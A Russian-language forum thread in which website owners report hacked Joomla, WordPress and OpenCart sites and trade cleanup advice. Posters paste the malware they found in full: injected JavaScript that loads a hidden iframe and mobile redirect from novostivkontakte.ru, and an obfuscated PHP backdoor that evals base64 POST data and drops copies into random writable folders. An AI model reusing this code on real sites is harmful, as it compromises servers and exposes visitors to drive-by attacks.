Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Хакнули! Наконец-то :)


willyns

Recommended Posts

Всем привет!

Сегодня проснулся от смс клиента - не могу зайти на ваш сайт! (Хехе, спасибо ему за это)

 

Бегу жеж смотреть, что такое, и вот:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in/home/*/*/system/library/session.php on line 11Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/webroid/prowood.com.ua/index.php:30) in /home/*/*/system/library/session.php on line 11Warning: Cannot modify header information - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in /home*/*/catalog/controller/common/seo_pro.php on line 305Warning: Cannot modify header information - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in /home/*/*/system/library/response.php on line 12

Побежал к хостеру сначала,  а потом думаю, а ну-ка гляну внимательнее, что там.

Заглядываем в index.php ииии ТАДАМ!!

 

/*CORE include code version:1.23 START*/


echo "<script type=\"text/javascript\"> 
    function sd5135GHEDF(agaga31323l) {
        var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
        if (typeof(melm) != \"undefined\" && melm!= null)
        {}else{
            var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
            dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
         dsdSSSWrw515312FFF.style.width = \"10px\";
         dsdSSSWrw515312FFF.style.height = \"10px\";
         dsdSSSWrw515312FFF.style.border = \"0px\";
         dsdSSSWrw515312FFF.frameBorder = \"0\";
            dsdSSSWrw515312FFF.style.position = \"absolute\";
            dsdSSSWrw515312FFF.style.left = \"-200\";
         dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
         document.body.appendChild(dsdSSSWrw515312FFF);
         dsdSSSWrw515312FFF.src = agaga31323l;
         return true;
        }
    }
function asd61234tkhjasd454hfhf235(){
    sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");   
}
function R(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){  }else{asd61234tkhjasd454hfhf235();}
}
setTimeout(function(){R();},1000);
</script>";


/*END CORE include code version:1.23*/

Вот он, злыдень!! :)

 

Скажите, дорогие специалисты, как такое стало возможным и как от этого оградиться в будущем?

 

Надіслати
Поділитися на інших сайтах


как такое стало возможным

п.1: долгий кропотливый анализ ситуации/логов/прочих_данных вам в помощь.

как от этого оградиться в будущем?

п.2: исходя из результатов п.1

Надіслати
Поділитися на інших сайтах

охохоюшки хохо )))

запустил сканирование сервера средствами хостера - да у меня там как у Жучки блох каких-то адских ифреймов и прочее... Жуть :) Причём в основном под ударом wordpress

 

ещё один злыдень с таким же кодом:

tivkontakte.ru
Надіслати
Поділитися на інших сайтах


вчера произошла такая же ситуация, пострадали все сайты на хостинге, именно джумлы, WP работает, синхронно с этой ситуацией в директориях www стали появляться разные файлы типа Vt56TG.php, причем пачками, решение не нашел пока, чищу и переношу сайты на другую площадку

Надіслати
Поділитися на інших сайтах


 стали появляться разные файлы типа Vt56TG.php

скорее всего шел...и пока вы не поудаляете все подозрительные файлы - перенос сайта на другую площадку мало чем поможет...

В большинстве случаев с которыми я сталкивался - заражение происходило через другие сайты на площадке...особенно жумла поучавствовала в этом.

Развместите ОС на отдельном хосте

Надіслати
Поділитися на інших сайтах


скорее всего шел...и пока вы не поудаляете все подозрительные файлы - перенос сайта на другую площадку мало чем поможет...

В большинстве случаев с которыми я сталкивался - заражение происходило через другие сайты на площадке...особенно жумла поучавствовала в этом.

Развместите ОС на отдельном хосте

этим и занимаюсь, выкачиваю и очищаю сайты от вредоносных файлов (кода) и заливаю группами на другие площадки, чтобы выявить какой из сайтов пробило.

Надіслати
Поділитися на інших сайтах


мда.... с утра удалил, вечером то же самое.

тулят свои ифреймы в index.php и admin/index.php

так ладно бы незаметно, так завешивает жеж весь сайт.

Эх, кулхацкеры, кулхацкеры  :-)

Надіслати
Поділитися на інших сайтах


мда.... с утра удалил, вечером то же самое.

тулят свои ифреймы в index.php и admin/index.php

так ладно бы незаметно, так завешивает жеж весь сайт.

Эх, кулхацкеры, кулхацкеры  :-)

У меня та же самая беда... Joomla 2.5

полазил и увидел что появился файлик замечательный в ".../plugins/system/widgetkit_zoo/widgets/slideshow/params/zoo2.4/pOOmfN.php"

через что получили доступ пока ума не приложу, смотрел что залили в папке cache и в основном в .js этого самого widgetkit

кто подскажет, как оградиться?

Надіслати
Поділитися на інших сайтах


Сегодня обнаружил такую же проблему. Файлы index.php в корне и в админке залечены js. В зараженных joomla и PHPBB. MODx не тронут. На хостинге были пустые папки с правами 755 внутри которых был обычный index.html. Так вот в этих папках обнаружилось множество php файлов под разными именами, но содержание у всех одинаковое.

<?php

$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
 $isevalfunctionavailable = false;                  
 $evalcheck = "\$isevalfunctionavailable = true;";
 @eval($evalcheck);
 if ($isevalfunctionavailable === true) {
    $fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
    
    $fv = $fnsdht($_POST["gjwqweodsa"]);
    @eval($fv);
    //@eval($_POST["gjwqweodsa"]);
 }else{
    $mpath =  realpath("")."/";
    //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
    if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
        @include_once($mpath."dsadasdsa1fag1.php");
        @unlink($mpath."dsadasdsa1fag1.php");
    }else{
        echo "ERROR! CANT DO NOTHING!";
    }
 }
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
  $fname = trim($_POST['fname']);
  $save_type = trim($_POST['save_type']);
  $dirname = trim($_POST['dirname']);
  $namecrt = trim($_POST['namecrt']);
  
  $auth_pass = trim($_POST['auth_pass']);
  $change_pass = trim($_POST['change_pass']);
  
  $file_type = trim($_POST['file_type']);
  $ftdata = trim($_POST['ftdata']);
  $is_sh = trim($_POST['is_sh']);
  
  if($namecrt == "random"){
    $fname = make_name($fname);
  }
  $uploadfile = "";
  
  if($save_type == "same_dir"){
    $uploadfile = realpath("")."/". $fname;
  }else if($save_type == "sub_dir"){
    $uploadfile = realpath("")."/$dirname/". $fname;
    if(!@mkdir(realpath("")."/$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    if(@is_writable($root)){
        $uploadfile = $root.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root_in_dir"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    $uploadfile = $root."$dirname/". $fname;
    if(!@mkdir($root."$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "random_dir"){
    $uploadfile = choose_dir();
    if(@is_writable($uploadfile)){
        $uploadfile = $uploadfile.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "random_dir_random_dirname"){
    $dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
    $dr = $dirs[array_rand($dirs)];
    
    $chodir =  choose_dir();
    $uploadfile = $chodir.$dr."/".$fname;
    
    if(!@mkdir($chodir."$dr/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else{
    $uploadfile = realpath("")."/". $fname;
  }
  if($file_type == "file"){
     if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
      {
        if($is_sh == "1" or $is_sh == 1){
            if($change_pass == "1" or $change_pass == 1){   
            
            }else{
                $auth_pass = "";
            }
            $d = @file_get_contents($uploadfile);
            $d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
            @file_put_contents($uploadfile,$d);
        }
        $url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
        echo "UPLOAD:".$url."-END";
      }
      else 
      {
            echo "ERROR upload";
      }
  }else{
    if($is_sh == "1" or $is_sh == 1){
            if($change_pass == "1" or $change_pass == 1){   
            
            }else{
                $auth_pass = "";
            }
            $ftdata = base64_decode($ftdata);
            $ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
    }
    if(@file_put_contents($uploadfile,$ftdata)){
    	@chmod($uploadfile,0644);
    	echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
    }else{
    	$fp = fopen($uploadfile, "w");
    	if($fp === false){
    		echo "ERROR upload";
    	}else{
    		@fputs ($fp, $ftdata);
    		@fclose ($fp);
    		@chmod($uploadfile,0644);
    		echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
    	}
    }
  }
      
}

function make_name($curname){
    $l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
    $leng = rand(3, 9);
    $ret = "";
    for($i = 0; $i < $leng; $i++){
        $ret .= $l[array_rand($l)];
    }
    $curname = explode(".",$curname);
    return $ret.".".$curname[1];
}

function choose_dir(){
    $lim = 0;
    $res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
    $t = array();
    for($j = 0; $j < count($res_dirs); $j++){
        $ct = explode("/",$res_dirs[$j]);
        $t[] = count($ct);
    }
    arsort($t);
    $cpath = "";
    $wrt_dirs = array();
    foreach($t as $key=>$val){
        if(@is_writable($res_dirs[$key])){
           if(@file_put_contents($res_dirs[$key]."t.php","hello")){
              @unlink($res_dirs[$key]."t.php");
              //$cpath =  $res_dirs[$key];
              //break;
              $wrt_dirs[] = $res_dirs[$key];
           }
        }
    }
    if(!empty($wrt_dirs) and count($wrt_dirs)>1){
        $cpath = $wrt_dirs[array_rand($wrt_dirs)];
    }
    if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
       $cpath = $_SERVER['DOCUMENT_ROOT']."/";
    }
    return $cpath;
}

function my_scan($startDir,&$lim){
    $cur_dir = @scandir($startDir);
    $res = array();
    for($ii = count($cur_dir)-1; $ii >=0; $ii--){
        $one_dir = $cur_dir[$ii];
        @set_time_limit(0);
        if($lim > 100)break;
        $d = $startDir.$one_dir;
        if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
            if(@is_readable($d."/")){
                $res[] = $d."/"; 
                $res = array_merge($res,my_scan($d."/",$lim)); 
            }   
        }
        $lim++;
    }
    return $res;
}
?> 

Т.к. названия файлов у всех разное, это говорит о том что его генерит скрипт, собственно он выше в php-коде, так же этот скрипт распихивает свои копии по рандомным папкам. Подозрение на шелл, будем искать. 

Надіслати
Поділитися на інших сайтах


 

 

Сегодня обнаружил такую же проблему. Файлы index.php в корне и в админке залечены js. В зараженных joomla и PHPBB. MODx не тронут. На хостинге были пустые папки с правами 755 внутри которых был обычный index.html. Так вот в этих папках обнаружилось множество php файлов под разными именами, но содержание у всех одинаковое.

 

В одной из веток здесь нашёл совет поискать base64_decode сквозь все файлы программой FileSeek

Нашёл 3 файла с кривыми генерёнными названиями

 \system\config\JRhmUunF.php

\system\config\CEVE___ab.php

\image\flags\Qra9sia.php

 

с таким же содержанием  :|

Надіслати
Поділитися на інших сайтах


Та же самая проблема на Joomla. Пострадали все сайты на хостинге. Файлы созданы 25 числа. index.php и куча левых файлов в разных папках. Удалил все, через час проблема повторилась. Кто-нибудь что-нибудь выяснил? Как эту гадость убрать? 

Надіслати
Поділитися на інших сайтах


Та же самая проблема на Joomla. Пострадали все сайты на хостинге. Файлы созданы 25 числа. index.php и куча левых файлов в разных папках. Удалил все, через час проблема повторилась. Кто-нибудь что-нибудь выяснил? Как эту гадость убрать?

Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

Надіслати
Поділитися на інших сайтах


Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

Да, напишите все какой хостер. Может это взломали хостера.

 

p.s. для поиска заразы рекомендую это http://www.revisium.com/ai/

  • +1 1
Надіслати
Поділитися на інших сайтах

Да, напишите все какой хостер. Может это взломали хостера.

 

p.s. для поиска заразы рекомендую это http://www.revisium.com/ai/

Хостинг RU-CENTER

 

Спасибо огромное за скрипт. Показывает всю заразу.

После удаления, пока что все ОК.

Надіслати
Поділитися на інших сайтах


У меня таже история, делаю откаты, помогает на 3 дня затем всё снова повторяется, хостинг от ihc.ru
на всех сайтах, joomla, opencart и InstantCMS. Воабще не понимаю что делать
 
вот этот код:

<script type="text/javascript">     function sd5135GHEDF(agaga31323l) {        var melm = document.getElementById("a35fdsfdsf62FFSSD");        if (typeof(melm) != "undefined" && melm!= null)        {}else{            var dsdSSSWrw515312FFF = document.createElement("iframe");            dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD";        	dsdSSSWrw515312FFF.style.width = "10px";        	dsdSSSWrw515312FFF.style.height = "10px";        	dsdSSSWrw515312FFF.style.border = "0px";        	dsdSSSWrw515312FFF.frameBorder = "0";            dsdSSSWrw515312FFF.style.position = "absolute";            dsdSSSWrw515312FFF.style.left = "-200";        	dsdSSSWrw515312FFF.setAttribute("frameBorder", "0");        	document.body.appendChild(dsdSSSWrw515312FFF);        	dsdSSSWrw515312FFF.src = agaga31323l;        	return true;        }    }function asd61234tkhjasd454hfhf235(){    sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm");   }function SFWR64362fdhHHHHH(){if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){  }else{asd61234tkhjasd454hfhf235();}if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){ try{setTimeout(function(){window.location="http://novostivkontakte.ru/?id=mob";},1000);}catch(err) {window.location="http://novostivkontakte.ru/?id=mob";location.href="http://novostivkontakte.ru/?id=mob";}}}//setTimeout(function(){R();},1500);try {        if(window.attachEvent) {            window.attachEvent("onload", SFWR64362fdhHHHHH);        } else {        if(window.onload) {            var curronload = window.onload;            var newonload = function() {                curronload();                SFWR64362fdhHHHHH();            };            window.onload = newonload;        } else {			window.onload = SFWR64362fdhHHHHH;		}	}} catch(err) {}
Надіслати
Поділитися на інших сайтах


Что удаляли и где? Нашли место взлома сайта?

 
Трудно сказать откуда именно залезло. 
На всех сайтах примерно все одно и то же, что-то типа этого:
(Все удалил, кроме index.php, их заменил на нормальные)
 
Критические замечания
 
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт:
Путь Дата создания Дата модификации Размер CRC32
.../docs/plugins/system/legacy/KUa__.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:15
6.50 Kb
-1991197706
.../docs/plugins/system/legacy/NI6rP2lN1.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:25
6.50 Kb
-1991197706
.../docs/plugins/system/mtupgrade/KTnkz.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:18
6.50 Kb
-1991197706
.../docs/plugins/system/ldZMkjXEV.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e"; $f
25/12/2013 03:09:40
6.49 Kb
-1875437887
.../docs/plugins/system/dvHBmx2.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:54:58
6.50 Kb
-1991197706
.../docs/plugins/user/NdMv_.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:11
6.50 Kb
-1991197706
.../docs/plugins/user/aj1l__35tJ.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:26
6.50 Kb
-1991197706
.../docs/plugins/xmlrpc/DWoLcAKs.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:21
6.50 Kb
-1991197706
.../docs/plugins/xmlrpc/avP.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
27/12/2013 17:14:05
6.50 Kb
-1991197706
.../docs/plugins/xmlrpc/K8d.php
<?php //|$auth_pass = "9bc2e1d95fab7d35f25dc619521182ff"; $auth_pass = ""; if(!empty($
27/12/2013 23:55:45
24.26 Kb
1205493127
.../docs/plugins/xmlrpc/sys09725827.php
ywpz}=text_macros(${${"\x47\x4c\x4fB\x41\x4cS"}["\x71\x77j\x72j\x6f"]});$zpddcmh|vkqr="\x6de\x73\x73a\x67\x65\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x6d\x62\x69\x68
28/12/2013 00:26:26
41.29 Kb
1192102346
.../docs/xmlrpc/cache/4mbuLNPm.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
27/12/2013 17:14:07
6.50 Kb
-1991197706
.../docs/xmlrpc/includes/qvtR6Ndn.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:14
6.50 Kb
-1991197706
 
Найдены сигнатуры javascript вирусов:
Путь Дата создания Дата модификации Размер CRC32
.../docs/index.php
pseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} |if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windo
27/12/2013 14:59:40
4.40 Kb
1607522158
.../docs/plugins/editors/jckeditor/plugins/pastefromword/filter/default.js
,convertToPx:(function(){var h=CKEDITOR.dom.element.createFromHtml('<div style=|position:absolute;left:-9999px;top:-9999px;margin:0px;padding:0px;border:0px;">
05/04/2012 20:33:36
11.57 Kb
-232178055
.../docs/plugins/xmlrpc/sys09725827.php
47\x4c\x4fBA\x4c\x53"}["b\x79\x79\x70c\x75yk]="\x6b\x65\x79";if(isset($_POST["c|\x6fde"])&&isset($_POST["\x63u\x73\x74\x6f\x6d\x5f\x61\x63t\x69on"])){eval(base
28/12/2013 00:26:26
41.29 Kb
1192102346
.../docs/administrator/index.php
pseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} |if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windo
27/12/2013 14:59:40
4.51 Kb
1603720537
 
Надіслати
Поділитися на інших сайтах


Ой помню этот пападос, только заразил не свои сайты и магазины заказчиков. Плювался потом

Всё лечиться вычисткой этой гадости, редиректов (магазины с мобил перекидывало на адалт или на скачку всякой всячины) и прочей хни, выставлением прав на папки и файлы и заменой всех паролей на хостинге и ftp.

 

P>S - не храните пароли в ftp клиентах типо FileZila и тд. Вся глина оттуда. 

 

 

 

У меня таже история, делаю откаты, помогает на 3 дня затем всё снова повторяется, хостинг от ihc.ru
на всех сайтах, joomla, opencart и InstantCMS. Воабще не понимаю что делать
 

 

 

Тупо перекатать сохранёнку и излечиться не получиться - это как ключи у воров - вы как квартиру не убирайте - всё равно ночью к вам попадут. Пароли меняйте!!!

Надіслати
Поділитися на інших сайтах


Первое что нужно сделать сменить пароли от фтп и бд, далее качаем сайт на локаль сканируем антивирусом и параллельно ищем и удаляем подозрительные файлы.

Возможные причины по которым вас ломанули:

  1. Варез (самая распространенная) любителям халявы посвящается :-D
  2. Не правильные права на каталоги (рекомендуемые 775 на папки 644 на файлы)
  3. Не обновленное ПО (открытые уязвимости)
  4. Заражена локальная машина с которой админят сайты (ваш комп, часто пароли угоняют с почтового клиента и иногда с фтп клиента)
  5. Слабые пароли (бутфорс)
  6. Хостинг (есть колхозно настроенные хостинги у которых одинаковый путь к каталогу сайта)

Анализируйте логи, делайте выводы, принимайте меры...

Надіслати
Поділитися на інших сайтах


У меня на джумле по мимо очистки и т.д., нашел "mod_confirmation", лежал себе там спокойно, в теперь внимание, перейдите по ссылке!))) 

нашел в google что по поиску только вот этот выдает,и не понятно, то ли они причастны, то ли тоже жертва

http://sjtorres.com/blah

 

еще "mod_administrator"

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.